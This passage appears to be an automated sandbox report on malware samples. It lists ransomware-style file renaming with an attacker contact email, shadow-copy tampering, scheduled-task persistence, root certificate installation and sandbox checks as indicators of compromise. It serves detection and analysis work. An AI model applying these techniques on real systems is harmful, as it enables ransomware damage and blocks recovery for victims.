    File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00092_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00308_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files\Mozilla Firefox\maintenanceservice.exe.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files (x86)\Microsoft Office\Office14\MCPS.DLL.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files (x86)\Microsoft Office\Office14\XOCR3.PSP.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files\Java\jre7\lib\zi\Asia\Kamchatka.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icudt36.dll.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04206_.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Pitcairn | 16.exe
    File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\WATER.ELM.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\en-US\msdaremr.dll.mui | 16.exe
    File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml | 16.exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106222.WMF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\PublicFunctions.js | 16.exe
    File created | C:\Program Files\Google\Chrome\Application\86.0.4240.111\Locales\en-US.pak.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\DATES.XML.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\TYPE.WAV.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files\Java\jre7\lib\zi\Asia\Baghdad.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files\NewSplit.xsl | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEWBY.GIF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\GIFT.XML.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\EssentialReport.dotx | 16.exe
    File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter_partly-cloudy.png | 16.exe
    File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_off.gif.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0294989.WMF | 16.exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF | 16.exe
    File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Belem.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO | 16.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Program crash
    WerFault.exe, WerFault.exe

    Reported IOCs

    pid | pid_target | process | target process
    1720 | 3384 | WerFault.exe | 21.exe
    4828 | 3968 | WerFault.exe | BTRSetp.exe
  • Checks processor information in registry
    azur.exe, winit.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | azur.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | azur.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | winit.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | winit.exe
  • Creates scheduled task(s)
    schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe, schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pid | process
    1520 | schtasks.exe
    1416 | schtasks.exe
    3664 | schtasks.exe
    4116 | schtasks.exe
    4524 | schtasks.exe
    2016 | schtasks.exe
    1036 | schtasks.exe
    1636 | schtasks.exe
    1528 | schtasks.exe
    3908 | schtasks.exe
    2164 | schtasks.exe
    4564 | schtasks.exe
    1680 | schtasks.exe
  • Delays execution with timeout.exe
    timeout.exe, timeout.exe, timeout.exe, timeout.exe, timeout.exe, timeout.exe

    Tags

    Reported IOCs

    pid | process
    3584 | timeout.exe
    2860 | timeout.exe
    4708 | timeout.exe
    1016 | timeout.exe
    2928 | timeout.exe
    2524 | timeout.exe
  • Gathers network information
    ipconfig.exe, NETSTAT.EXE

    Description

    Uses a command-line utility to view network configuration.

    TTPs

    System Information Discovery, Command-Line Interface

    Reported IOCs

    pid | process
    5272 | ipconfig.exe
    2920 | NETSTAT.EXE
  • Interacts with shadow copies
    vssadmin.exe, vssadmin.exe

    Description

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    Tags

    TTPs

    File Deletion, Inhibit System Recovery

    Reported IOCs

    pid | process
    4044 | vssadmin.exe
    1112 | vssadmin.exe
  • Kills process with taskkill
    taskkill.exe, taskkill.exe, taskkill.exe, taskkill.exe, taskkill.exe, taskkill.exe

    Reported IOCs

    pid | process
    4792 | taskkill.exe
    2412 | taskkill.exe
    1224 | taskkill.exe
    1812 | taskkill.exe
    3792 | taskkill.exe
    2940 | taskkill.exe
  • Modifies Internet Explorer settings
    IEXPLORE.EXE, iexplore.exe, iexplore.exe, IEXPLORE.EXE, mshta.exe, mstsc.exe, IEXPLORE.EXE, cmmon32.exe

    TTPs

    Modify Registry

    Reported IOCs

    description | ioc | process
    Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\iplogger.org\ = "18" | IEXPLORE.EXE
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | iexplore.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage | IEXPLORE.EXE
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | iexplore.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | iexplore.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d00f0c3d9abed601 | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | IEXPLORE.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "18" | IEXPLORE.EXE
    Key created | \Registry\User\S-1-5-21-3825035466-2522850611-591511364-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | mstsc.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | IEXPLORE.EXE
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup | iexplore.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | iexplore.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\iplogger.org\NumberOfSubdomains = "1" | IEXPLORE.EXE
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom | iexplore.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{6B1DA300-2A8C-11EB-AE0F-E67B5CAEC115} = "0" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | iexplore.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | IEXPLORE.EXE
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "312571896" | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FD934230-2A8C-11EB-AE0F-E67B5CAEC115} = "0" | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
    Set value (data) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\iplogger.org | IEXPLORE.EXE
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | IEXPLORE.EXE
    Key created | \Registry\User\S-1-5-21-3825035466-2522850611-591511364-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | cmmon32.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU | iexplore.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms | iexplore.exe
  • Modifies data under HKEY_USERS
    svchost.exe

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | svchost.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | svchost.exe
  • Modifies registry class
    winit.exe

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | winit.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database | winit.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | winit.exe
  • Modifies registry key
    REG.exe

    TTPs

    Modify Registry

    Reported IOCs

    pid | process
    3552 | REG.exe
  • Modifies system certificate store
    14.exe, winit.exe, aliens.exe, jg2_2qua.exe, intro.exe, intro.exe

    TTPs

    Install Root Certificate, Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD | aliens.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | intro.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | 14.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD | intro.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | 14.exe
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C | winit.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD | jg2_2qua.exe
  • NTFS ADS
    update.exe, utorrent.exe, taskhost.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Users\Admin\Desktop\WinMgmts:\ | update.exe
    File opened for modification | C:\Users\Admin\Desktop\WinMgmts:\ | utorrent.exe
    File opened for modification | C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\ | taskhost.exe
  • Runs .reg file with regedit
    regedit.exe, regedit.exe

    Reported IOCs

    pid | process
    1648 | regedit.exe
    1568 | regedit.exe
  • Runs net.exe
  • Runs ping.exe
    PING.EXE, PING.EXE, PING.EXE, PING.EXE, PING.EXE, PING.EXE, PING.EXE, PING.EXE, PING.EXE, PING.EXE, PING.EXE

    TTPs

    Remote System Discovery

    Reported IOCs

    pid | process
    3008 | PING.EXE
    2128 | PING.EXE
    2296 | PING.EXE
    2672 | PING.EXE
    3816 | PING.EXE
    2164 | PING.EXE
    3668 | PING.EXE
    5064 | PING.EXE
    4320 | PING.EXE
    2548 | PING.EXE
    4052 | PING.EXE
  • Suspicious behavior: AddClipboardFormatListener
    api.exe

    Reported IOCs

    pid | process
    2308 | api.exe
  • Suspicious behavior: CmdExeWriteProcessMemorySpam
    2.exe, 3.exe, 4.exe, 5.exe, 6.exe, 7.exe, 8.exe, 9.exe, 10.exe, 11.exe, 12.exe, 13.exe, 14.exe, 15.exe, 16.exe, 17.exe, 18.exe, 19.exe, 20.exe, 21.exe, 22.exe, 23.exe, 24.exe, 25.exe, 26.exe, 27.exe, 28.exe, 29.exe, 30.exe, 31.exe

    Reported IOCs

    pid | process
    1076 | 2.exe
    2632 | 3.exe
    2744 | 4.exe
    2588 | 5.exe
    1776 | 6.exe
    1900 | 7.exe
    2352 | 8.exe
    2180 | 9.exe
    2076 | 10.exe
    1844 | 11.exe
    2124 | 12.exe
    1604 | 13.exe
    2648 | 14.exe
    1944 | 15.exe
    816 | 16.exe
    2012 | 17.exe
    3068 | 18.exe
    3008 | 19.exe
    3136 | 20.exe
    3384 | 21.exe
    3552 | 22.exe
    3744 | 23.exe
    3832 | 24.exe
    3868 | 25.exe
    3956 | 26.exe
    4016 | 27.exe
    4084 | 28.exe
    2548 | 29.exe
    948 | 30.exe
    3324 | 31.exe
  • Suspicious behavior: EnumeratesProcesses
    update.exe, rutserv.exe, rutserv.exe, rutserv.exe, rutserv.exe, winit.exe, LtHv0O2KZDK4M637.exe, key.exe, 2.exe, 2.exe

    Reported IOCs

    pid | process
    1748 | update.exe
    1748 | update.exe
    1748 | update.exe
    1748 | update.exe
    1748 | update.exe
    1516 | rutserv.exe
    1516 | rutserv.exe
    1516 | rutserv.exe
    1516 | rutserv.exe
    1600 | rutserv.exe
    1600 | rutserv.exe
    2180 | rutserv.exe
    2180 | rutserv.exe
    2280 | rutserv.exe
    2280 | rutserv.exe
    2280 | rutserv.exe
    2280 | rutserv.exe
    2280 | rutserv.exe
    2280 | rutserv.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1632 | winit.exe
    1732 | LtHv0O2KZDK4M637.exe
    1732 | LtHv0O2KZDK4M637.exe
    1732 | LtHv0O2KZDK4M637.exe
